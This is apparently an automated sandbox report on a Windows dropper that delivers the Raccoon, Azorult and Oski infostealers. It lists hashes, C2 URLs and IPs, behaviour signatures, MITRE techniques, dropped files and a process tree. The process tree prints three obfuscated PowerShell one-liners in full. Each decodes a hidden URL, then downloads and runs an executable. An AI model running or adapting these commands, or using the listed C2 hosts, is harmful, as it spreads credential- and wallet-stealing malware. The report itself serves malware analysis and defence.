Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    24-11-2021 07:56

General

  • Target

    C594188774A2D72B774ACA96EB096C493DBE5C9B599BE.exe

  • Size

    103KB

  • MD5

    f88740451956d87424b84326e9e9dde7

  • SHA1

    a0ccae106a243ad2b1d748512c3e6783b2dd2547

  • SHA256

    c594188774a2d72b774aca96eb096c493dbe5c9b599bef4601ed404dfe2fab53

  • SHA512

    1760df8b84624fbde5b4e6447a030ce31e45bc23fb152c2a72c52b9f652283a5f3bb7557a85620943ddc3fff3c4b7071ae864783f3731c9aea390eaf7068aa06

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://opesjk.ug/asdf.EXE

exe.dropper

http://opesjk.ug/asdf.EXE

Extracted

Family

raccoon

Version

1.8.3-hotfix

Botnet

7632dffeb03da57edca98c8bfb2611868e8eb0a7

Attributes
  • url4cnc

    http://91.219.236.162/brikitiki

    http://185.163.47.176/brikitiki

    http://193.38.54.238/brikitiki

    http://74.119.192.122/brikitiki

    http://91.219.236.240/brikitiki

    https://t.me/brikitiki

rc4.plain
rc4.plain

Extracted

Family

azorult

C2

http://195.245.112.115/index.php

Extracted

Family

oski

C2

colonna.ac.ug

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • ACProtect 1.3x - 1.4x DLL software 1 IoCs

    Detects file using ACProtect software.

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 10 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 1 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\C594188774A2D72B774ACA96EB096C493DBE5C9B599BE.exe
    "C:\Users\Admin\AppData\Local\Temp\C594188774A2D72B774ACA96EB096C493DBE5C9B599BE.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2412
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BFB7.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\C594188774A2D72B774ACA96EB096C493DBE5C9B599BE.exe"
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3080
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BFB7.tmp\546897459.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1936
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$npadigy = Get-Random -Min 3 -Max 4;$coprsqtmd = ([char[]]([char]97..[char]122));$utqfscbxh = -join ($coprsqtmd | Get-Random -Count $npadigy | % {[Char]$_});$gneym = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$ympekafs = $utqfscbxh + $gneym;$lcjfzwmk=[char]0x53+[char]0x61+[char]0x4c;$gvabtxz=[char]0x49+[char]0x45+[char]0x58;$ykrcpi=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL qucmgwsve $lcjfzwmk;$ruhkjw=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;qucmgwsve hbgrst $gvabtxz;$tmyhezgdac=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|hbgrst;qucmgwsve ezyftwlpxijv $ykrcpi;$pgbsknxmfy = $tmyhezgdac + [char]0x5c + $ympekafs;;;;$wftxhgbkup = 'aHR0cDovL2JpdC5kby9lMzNCcg==';$wftxhgbkup=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($wftxhgbkup));$gxhzkab = New-Object $ruhkjw;$ftsouwdr = $gxhzkab.DownloadData($wftxhgbkup);[IO.File]::WriteAllBytes($pgbsknxmfy, $ftsouwdr);ezyftwlpxijv $pgbsknxmfy;;$xvneyqgr = @($vhbkwatp, $yilcegqnaru, $gxdrwlyhtk, $dqkucgyeas);foreach($ylcgumvzn in $xvneyqgr){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2956
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BFB7.tmp\89465456.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1268
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$npadigy = Get-Random -Min 3 -Max 4;$coprsqtmd = ([char[]]([char]97..[char]122));$utqfscbxh = -join ($coprsqtmd | Get-Random -Count $npadigy | % {[Char]$_});$gneym = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$ympekafs = $utqfscbxh + $gneym;$lcjfzwmk=[char]0x53+[char]0x61+[char]0x4c;$gvabtxz=[char]0x49+[char]0x45+[char]0x58;$ykrcpi=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL bsrucof $lcjfzwmk;$ruhkjw=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;bsrucof pjwasi $gvabtxz;$tmyhezgdac=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pjwasi;bsrucof vngqajdhxmbksl $ykrcpi;$pgbsknxmfy = $tmyhezgdac + [char]0x5c + $ympekafs;;;;$wftxhgbkup = 'aHR0cDovL29wZXNqay51Zy9hc2RmLkVYRQ==';$wftxhgbkup=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($wftxhgbkup));$gxhzkab = New-Object $ruhkjw;$ftsouwdr = $gxhzkab.DownloadData($wftxhgbkup);[IO.File]::WriteAllBytes($pgbsknxmfy, $ftsouwdr);vngqajdhxmbksl $pgbsknxmfy;;$xvneyqgr = @($vhbkwatp, $yilcegqnaru, $gxdrwlyhtk, $dqkucgyeas);foreach($ylcgumvzn in $xvneyqgr){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:588
          • C:\Users\Public\far.exe
            "C:\Users\Public\far.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2308
            • C:\Users\Admin\AppData\Local\Temp\fsacvbe.exe
              "C:\Users\Admin\AppData\Local\Temp\fsacvbe.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3892
              • C:\Users\Admin\AppData\Local\Temp\fsacvbe.exe
                "C:\Users\Admin\AppData\Local\Temp\fsacvbe.exe"
                7⤵
                • Executes dropped EXE
                PID:3500
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BFB7.tmp\54686754.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:372
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$npadigy = Get-Random -Min 3 -Max 4;$coprsqtmd = ([char[]]([char]97..[char]122));$utqfscbxh = -join ($coprsqtmd | Get-Random -Count $npadigy | % {[Char]$_});$gneym = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$ympekafs = $utqfscbxh + $gneym;$lcjfzwmk=[char]0x53+[char]0x61+[char]0x4c;$gvabtxz=[char]0x49+[char]0x45+[char]0x58;$ykrcpi=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL lskybn $lcjfzwmk;$ruhkjw=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;lskybn lpiftacswu $gvabtxz;$tmyhezgdac=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|lpiftacswu;lskybn gydjurelmf $ykrcpi;$pgbsknxmfy = $tmyhezgdac + [char]0x5c + $ympekafs;;;;$wftxhgbkup = 'aHR0cDovL2JpdC5kby9lMzNCeA==';$wftxhgbkup=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($wftxhgbkup));$gxhzkab = New-Object $ruhkjw;$ftsouwdr = $gxhzkab.DownloadData($wftxhgbkup);[IO.File]::WriteAllBytes($pgbsknxmfy, $ftsouwdr);gydjurelmf $pgbsknxmfy;;$xvneyqgr = @($vhbkwatp, $yilcegqnaru, $gxdrwlyhtk, $dqkucgyeas);foreach($ylcgumvzn in $xvneyqgr){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3840
          • C:\Users\Public\vrk.exe
            "C:\Users\Public\vrk.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3800
            • C:\Users\Admin\AppData\Local\Temp\cbvdsme.exe
              "C:\Users\Admin\AppData\Local\Temp\cbvdsme.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1432
              • C:\Users\Admin\AppData\Local\Temp\cbvdsme.exe
                "C:\Users\Admin\AppData\Local\Temp\cbvdsme.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                • Suspicious use of WriteProcessMemory
                PID:1636
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 1636 & erase C:\Users\Admin\AppData\Local\Temp\cbvdsme.exe & RD /S /Q C:\\ProgramData\\337795354721275\\* & exit
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3868
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /pid 1636
                    9⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1312
            • C:\Users\Admin\AppData\Local\Temp\fsacvbe.exe
              "C:\Users\Admin\AppData\Local\Temp\fsacvbe.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2480
              • C:\Users\Admin\AppData\Local\Temp\fsacvbe.exe
                "C:\Users\Admin\AppData\Local\Temp\fsacvbe.exe"
                7⤵
                • Executes dropped EXE
                PID:1132
            • C:\Users\Public\vrk.exe
              "C:\Users\Public\vrk.exe"
              6⤵
              • Executes dropped EXE
              PID:1288
      • C:\Users\Admin\AppData\Local\Temp\BFB7.tmp\Patch-nb9.exe
        Patch-nb9.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:1052

Network

MITRE ATT&CK Matrix ATT&CK v6

Credential Access

Credentials in Files

2
T1081

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Collection

Data from Local System

2
T1005

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    MD5

    b751492c41c6f3173d3b6f31c1b9b4eb

    SHA1

    abc53a2c939b1d774940deb0b888b7b1ba5a3c7b

    SHA256

    ad95fdf313324ed94997cec026239ea3631bf27298500e5def5941db9493b457

    SHA512

    afa65279455b98353c6fe6869f2b545231231a953afbb1bf2eaed6b11646c4b4c77c5c18102651ae247a2f0fa18c698d908f4d23ca91581cbf28e32e061cb2e2

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    25f3e8bbd3e88a3d01d8030a8d671e75

    SHA1

    eb3d002afd1e45b263cf6733da792e57189b5b69

    SHA256

    4ff47f20c29d59f862ef6b49682cb4f9adfa2e9f0dc67dd46c4825f0153f51ea

    SHA512

    099fb07bed4e62403978f982b4fe51a1d622c8bb4a220e1c82aa3c7a32835047333f2e75f425dd7b32ddbf3f999c66a831524657e7449ebd4c8b67dd10589e32

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    fa37562ca9c5cce0e1969d645cd8dbe9

    SHA1

    3028ffbd09b742083dd4fdc5b709e1ead534027b

    SHA256

    5ad49080953e546f29df55cae7a07d3d42741d9e25e1fe8d74f2b16bfd352eb3

    SHA512

    6036b39e1bc0cab913ae0c03c1f72d4e6cf571246efccf471f2e3fc44c264d0cba03fc0840107872303d6c48d8c06059f1ce40242fb7e388cf47ba628fa375fa

  • C:\Users\Admin\AppData\Local\Temp\BFB7.tmp\54686754.hta
    MD5

    5e0b83801fa4886fd46875ae3a41b1ac

    SHA1

    ed43bed966b468947a45639dc658ec2bf19f2809

    SHA256

    0af01305bb30f2f02814d819a1611b7f19d814ebf23a8b9a4a1573cb94fadba2

    SHA512

    39747d8cb05c058e10485834e489c1fa4d6e99a95c13f7c2499dc6fe385698c02d222f855277d7ec2f6c30eb4b9446e5c62aa53cf21ca677d23f298f9f94ca27

  • C:\Users\Admin\AppData\Local\Temp\BFB7.tmp\546897459.hta
    MD5

    494b1b06327accca63dafccbf8f8a67a

    SHA1

    d77a33d31f025ceebce9e1a64758cb35f8b7676c

    SHA256

    21fe0379c4df558b3cd2874200a812af7741e6edfa54b88c852ce1f42e2a683a

    SHA512

    15a23bcdc5595d48e5e9558a2d70133739e38ba081abfe0d6548af238e2276999377edfa7aa1ff9aceaaa49bafbe08b62a9189ee2f3df8fdcd7af46e03a1d6ea

  • C:\Users\Admin\AppData\Local\Temp\BFB7.tmp\89465456.hta
    MD5

    455f7162de92d00a80bf49a51bd559d2

    SHA1

    53c5d138507941817c8e1702113d7e78b85e74a2

    SHA256

    261393c726f2eb67fab94ec3031bf2144b8e1c01aaa1ffe2fbb49e502f1a8f8c

    SHA512

    06b681397236e36ac3b2394e4e948b1da8a74546d5cc9bb4c7bcba0b6d2d385d771a25013dfa9e440e39b1574a2c8ac9e4083d0acdebe025d3649b0d64b8f638

  • C:\Users\Admin\AppData\Local\Temp\BFB7.tmp\Patch-nb9.exe
    MD5

    50a3f5f228bcc21b4c3487b882672ebd

    SHA1

    facd0a9ec9d4deb17519ad4b5c1e1a298c51e8bd

    SHA256

    d5d2404d1162f37d09d9da2c920250503fcfca10e136fdf376cb2bab552973c9

    SHA512

    b3bf2726b3404755e608cba5f1c7464640166a93ad29a84a6658a889534d7088a2eaf70df1f9cd0debe104000b51f543313206b231b20a7d283fba0f3697d1ce

  • C:\Users\Admin\AppData\Local\Temp\BFB7.tmp\Patch-nb9.exe
    MD5

    50a3f5f228bcc21b4c3487b882672ebd

    SHA1

    facd0a9ec9d4deb17519ad4b5c1e1a298c51e8bd

    SHA256

    d5d2404d1162f37d09d9da2c920250503fcfca10e136fdf376cb2bab552973c9

    SHA512

    b3bf2726b3404755e608cba5f1c7464640166a93ad29a84a6658a889534d7088a2eaf70df1f9cd0debe104000b51f543313206b231b20a7d283fba0f3697d1ce

  • C:\Users\Admin\AppData\Local\Temp\BFB7.tmp\start.bat
    MD5

    46ca3b99bf1d8afc13591f1a2ad225c0

    SHA1

    f22241738695d3f4dac7c29b12e3ef1391bc496f

    SHA256

    ae721a6eea339043b06026ce890d9805e04afa25c72603647fbfe48c1724f4b7

    SHA512

    5a8967b3deb1ac3decc43579b4797e14ec0efbb54b5ea6c6126c8cc640788d491237fb4daed01095f896dfab98796f1766c789c664e03da087ed9e80315e0891

  • C:\Users\Admin\AppData\Local\Temp\cbvdsme.exe
    MD5

    af4f7630f1e292f5d6a4e7157c662550

    SHA1

    d74428bab94698e8f71134f2ce0020403e16ccc8

    SHA256

    b5f94e330b47c0dcf0e748af9e3e9a030d0c678301eb4ba5c391ad650ecf146a

    SHA512

    b893918c1add4f44a47d5ab20f983bcfdac04c747226f7c6b57f749d0c28942d95818d5b3127bc9e38ba83ac3107fe5ec479920347814ebc1702962428bcceba

  • C:\Users\Admin\AppData\Local\Temp\cbvdsme.exe
    MD5

    af4f7630f1e292f5d6a4e7157c662550

    SHA1

    d74428bab94698e8f71134f2ce0020403e16ccc8

    SHA256

    b5f94e330b47c0dcf0e748af9e3e9a030d0c678301eb4ba5c391ad650ecf146a

    SHA512

    b893918c1add4f44a47d5ab20f983bcfdac04c747226f7c6b57f749d0c28942d95818d5b3127bc9e38ba83ac3107fe5ec479920347814ebc1702962428bcceba

  • C:\Users\Admin\AppData\Local\Temp\cbvdsme.exe
    MD5

    af4f7630f1e292f5d6a4e7157c662550

    SHA1

    d74428bab94698e8f71134f2ce0020403e16ccc8

    SHA256

    b5f94e330b47c0dcf0e748af9e3e9a030d0c678301eb4ba5c391ad650ecf146a

    SHA512

    b893918c1add4f44a47d5ab20f983bcfdac04c747226f7c6b57f749d0c28942d95818d5b3127bc9e38ba83ac3107fe5ec479920347814ebc1702962428bcceba

  • C:\Users\Admin\AppData\Local\Temp\fsacvbe.exe
    MD5

    a78c23397c81f5e49296b6ff5b956928

    SHA1

    1b6ab1769e58c21c9cd6aa343379fbe5cefda526

    SHA256

    bc1722809baae20c024e8e9c71c0ff81f6af06989f15518c573fcf2d5a8218df

    SHA512

    c25b42a52bf81a99cc87ff8afd6c3e23e018e9e0e9b4c2cd4a8a124173f8a7cfbe4cd3a6cab4456bd51411b1fd5a45399a3f499df8d4b4acea8b9143b6d5b1b4

  • C:\Users\Admin\AppData\Local\Temp\fsacvbe.exe
    MD5

    a78c23397c81f5e49296b6ff5b956928

    SHA1

    1b6ab1769e58c21c9cd6aa343379fbe5cefda526

    SHA256

    bc1722809baae20c024e8e9c71c0ff81f6af06989f15518c573fcf2d5a8218df

    SHA512

    c25b42a52bf81a99cc87ff8afd6c3e23e018e9e0e9b4c2cd4a8a124173f8a7cfbe4cd3a6cab4456bd51411b1fd5a45399a3f499df8d4b4acea8b9143b6d5b1b4

  • C:\Users\Admin\AppData\Local\Temp\fsacvbe.exe
    MD5

    a78c23397c81f5e49296b6ff5b956928

    SHA1

    1b6ab1769e58c21c9cd6aa343379fbe5cefda526

    SHA256

    bc1722809baae20c024e8e9c71c0ff81f6af06989f15518c573fcf2d5a8218df

    SHA512

    c25b42a52bf81a99cc87ff8afd6c3e23e018e9e0e9b4c2cd4a8a124173f8a7cfbe4cd3a6cab4456bd51411b1fd5a45399a3f499df8d4b4acea8b9143b6d5b1b4

  • C:\Users\Admin\AppData\Local\Temp\fsacvbe.exe
    MD5

    a78c23397c81f5e49296b6ff5b956928

    SHA1

    1b6ab1769e58c21c9cd6aa343379fbe5cefda526

    SHA256

    bc1722809baae20c024e8e9c71c0ff81f6af06989f15518c573fcf2d5a8218df

    SHA512

    c25b42a52bf81a99cc87ff8afd6c3e23e018e9e0e9b4c2cd4a8a124173f8a7cfbe4cd3a6cab4456bd51411b1fd5a45399a3f499df8d4b4acea8b9143b6d5b1b4

  • C:\Users\Admin\AppData\Local\Temp\fsacvbe.exe
    MD5

    a78c23397c81f5e49296b6ff5b956928

    SHA1

    1b6ab1769e58c21c9cd6aa343379fbe5cefda526

    SHA256

    bc1722809baae20c024e8e9c71c0ff81f6af06989f15518c573fcf2d5a8218df

    SHA512

    c25b42a52bf81a99cc87ff8afd6c3e23e018e9e0e9b4c2cd4a8a124173f8a7cfbe4cd3a6cab4456bd51411b1fd5a45399a3f499df8d4b4acea8b9143b6d5b1b4

  • C:\Users\Admin\AppData\Local\Temp\fsacvbe.exe
    MD5

    a78c23397c81f5e49296b6ff5b956928

    SHA1

    1b6ab1769e58c21c9cd6aa343379fbe5cefda526

    SHA256

    bc1722809baae20c024e8e9c71c0ff81f6af06989f15518c573fcf2d5a8218df

    SHA512

    c25b42a52bf81a99cc87ff8afd6c3e23e018e9e0e9b4c2cd4a8a124173f8a7cfbe4cd3a6cab4456bd51411b1fd5a45399a3f499df8d4b4acea8b9143b6d5b1b4

  • C:\Users\Public\far.exe
    MD5

    a3cc781be4a0cc75f14ce69b59f8c99f

    SHA1

    9c13ea485984c9e75196c4d0bd871b1b7dc72017

    SHA256

    e4649c5b452d75aa2cdfdb8bffed9dd6c558d3cb1225c877bf570abb7b106221

    SHA512

    bb9f6115dac6d1001f5223c9a8d00c7c2b3865d7e9f99bad773df52d188e93282547ea37e496d987f3243c2445afaefe76b7e4849c2eb09bd73ba9ea21e23430

  • C:\Users\Public\far.exe
    MD5

    a3cc781be4a0cc75f14ce69b59f8c99f

    SHA1

    9c13ea485984c9e75196c4d0bd871b1b7dc72017

    SHA256

    e4649c5b452d75aa2cdfdb8bffed9dd6c558d3cb1225c877bf570abb7b106221

    SHA512

    bb9f6115dac6d1001f5223c9a8d00c7c2b3865d7e9f99bad773df52d188e93282547ea37e496d987f3243c2445afaefe76b7e4849c2eb09bd73ba9ea21e23430

  • C:\Users\Public\vrk.exe
    MD5

    a3cc781be4a0cc75f14ce69b59f8c99f

    SHA1

    9c13ea485984c9e75196c4d0bd871b1b7dc72017

    SHA256

    e4649c5b452d75aa2cdfdb8bffed9dd6c558d3cb1225c877bf570abb7b106221

    SHA512

    bb9f6115dac6d1001f5223c9a8d00c7c2b3865d7e9f99bad773df52d188e93282547ea37e496d987f3243c2445afaefe76b7e4849c2eb09bd73ba9ea21e23430

  • C:\Users\Public\vrk.exe
    MD5

    a3cc781be4a0cc75f14ce69b59f8c99f

    SHA1

    9c13ea485984c9e75196c4d0bd871b1b7dc72017

    SHA256

    e4649c5b452d75aa2cdfdb8bffed9dd6c558d3cb1225c877bf570abb7b106221

    SHA512

    bb9f6115dac6d1001f5223c9a8d00c7c2b3865d7e9f99bad773df52d188e93282547ea37e496d987f3243c2445afaefe76b7e4849c2eb09bd73ba9ea21e23430

  • C:\Users\Public\vrk.exe
    MD5

    a3cc781be4a0cc75f14ce69b59f8c99f

    SHA1

    9c13ea485984c9e75196c4d0bd871b1b7dc72017

    SHA256

    e4649c5b452d75aa2cdfdb8bffed9dd6c558d3cb1225c877bf570abb7b106221

    SHA512

    bb9f6115dac6d1001f5223c9a8d00c7c2b3865d7e9f99bad773df52d188e93282547ea37e496d987f3243c2445afaefe76b7e4849c2eb09bd73ba9ea21e23430

  • \ProgramData\mozglue.dll
    MD5

    8f73c08a9660691143661bf7332c3c27

    SHA1

    37fa65dd737c50fda710fdbde89e51374d0c204a

    SHA256

    3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

    SHA512

    0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

  • \ProgramData\nss3.dll
    MD5

    bfac4e3c5908856ba17d41edcd455a51

    SHA1

    8eec7e888767aa9e4cca8ff246eb2aacb9170428

    SHA256

    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

    SHA512

    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

  • \ProgramData\sqlite3.dll
    MD5

    e477a96c8f2b18d6b5c27bde49c990bf

    SHA1

    e980c9bf41330d1e5bd04556db4646a0210f7409

    SHA256

    16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

    SHA512

    335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

  • \Users\Admin\AppData\Local\Temp\dup2patcher.dll
    MD5

    45c41eb1682fa0166f95aac876216375

    SHA1

    996400179494633458e160b5f0be6d62653cff75

    SHA256

    2666ab3caaa1f2aa111652e034af8f278f3741d7730576939c86bfb5496c2ab2

    SHA512

    a2a393400369dbd86c1e445776eef537582d26a50e7455841752a8d75d87ef867ab9daf3e7a9927281d87cdf35e988dc599b104cd1078e91c78108c9fea17408

  • memory/372-122-0x0000000000000000-mapping.dmp
  • memory/588-145-0x0000000006BE2000-0x0000000006BE3000-memory.dmp
    Filesize

    4KB

  • memory/588-188-0x0000000006BE3000-0x0000000006BE4000-memory.dmp
    Filesize

    4KB

  • memory/588-154-0x00000000078C0000-0x00000000078C1000-memory.dmp
    Filesize

    4KB

  • memory/588-140-0x0000000006BE0000-0x0000000006BE1000-memory.dmp
    Filesize

    4KB

  • memory/588-136-0x0000000002E60000-0x0000000002E61000-memory.dmp
    Filesize

    4KB

  • memory/588-132-0x0000000002CD0000-0x0000000002CD1000-memory.dmp
    Filesize

    4KB

  • memory/588-129-0x0000000000000000-mapping.dmp
  • memory/588-171-0x0000000002CD0000-0x0000000002CD1000-memory.dmp
    Filesize

    4KB

  • memory/588-135-0x0000000002CD0000-0x0000000002CD1000-memory.dmp
    Filesize

    4KB

  • memory/1052-123-0x0000000000000000-mapping.dmp
  • memory/1132-300-0x00000000007C0000-0x00000000007C1000-memory.dmp
    Filesize

    4KB

  • memory/1132-299-0x0000000000400000-0x0000000000420000-memory.dmp
    Filesize

    128KB

  • memory/1132-291-0x000000000041A684-mapping.dmp
  • memory/1268-120-0x0000000000000000-mapping.dmp
  • memory/1288-297-0x0000000000400000-0x0000000000491000-memory.dmp
    Filesize

    580KB

  • memory/1288-289-0x000000000043F176-mapping.dmp
  • memory/1288-298-0x00000000001E0000-0x00000000001E1000-memory.dmp
    Filesize

    4KB

  • memory/1312-308-0x0000000000000000-mapping.dmp
  • memory/1432-284-0x00000000004F0000-0x000000000059E000-memory.dmp
    Filesize

    696KB

  • memory/1432-288-0x00000000004F0000-0x000000000059E000-memory.dmp
    Filesize

    696KB

  • memory/1432-260-0x0000000000000000-mapping.dmp
  • memory/1636-301-0x0000000000400000-0x0000000000434000-memory.dmp
    Filesize

    208KB

  • memory/1636-293-0x0000000000417A8B-mapping.dmp
  • memory/1636-302-0x00000000004A0000-0x00000000005EA000-memory.dmp
    Filesize

    1.3MB

  • memory/1936-118-0x0000000000000000-mapping.dmp
  • memory/2308-261-0x0000000000670000-0x0000000000671000-memory.dmp
    Filesize

    4KB

  • memory/2308-225-0x0000000000000000-mapping.dmp
  • memory/2480-256-0x0000000000000000-mapping.dmp
  • memory/2480-283-0x0000000000540000-0x000000000068A000-memory.dmp
    Filesize

    1.3MB

  • memory/2956-181-0x00000000095B0000-0x00000000095B1000-memory.dmp
    Filesize

    4KB

  • memory/2956-139-0x0000000006A80000-0x0000000006A81000-memory.dmp
    Filesize

    4KB

  • memory/2956-127-0x0000000000000000-mapping.dmp
  • memory/2956-131-0x0000000000850000-0x0000000000851000-memory.dmp
    Filesize

    4KB

  • memory/2956-184-0x0000000008B50000-0x0000000008B51000-memory.dmp
    Filesize

    4KB

  • memory/2956-160-0x0000000006960000-0x0000000006961000-memory.dmp
    Filesize

    4KB

  • memory/2956-169-0x0000000000850000-0x0000000000851000-memory.dmp
    Filesize

    4KB

  • memory/2956-147-0x0000000006A82000-0x0000000006A83000-memory.dmp
    Filesize

    4KB

  • memory/2956-133-0x0000000000850000-0x0000000000851000-memory.dmp
    Filesize

    4KB

  • memory/2956-157-0x00000000076F0000-0x00000000076F1000-memory.dmp
    Filesize

    4KB

  • memory/2956-151-0x0000000006EE0000-0x0000000006EE1000-memory.dmp
    Filesize

    4KB

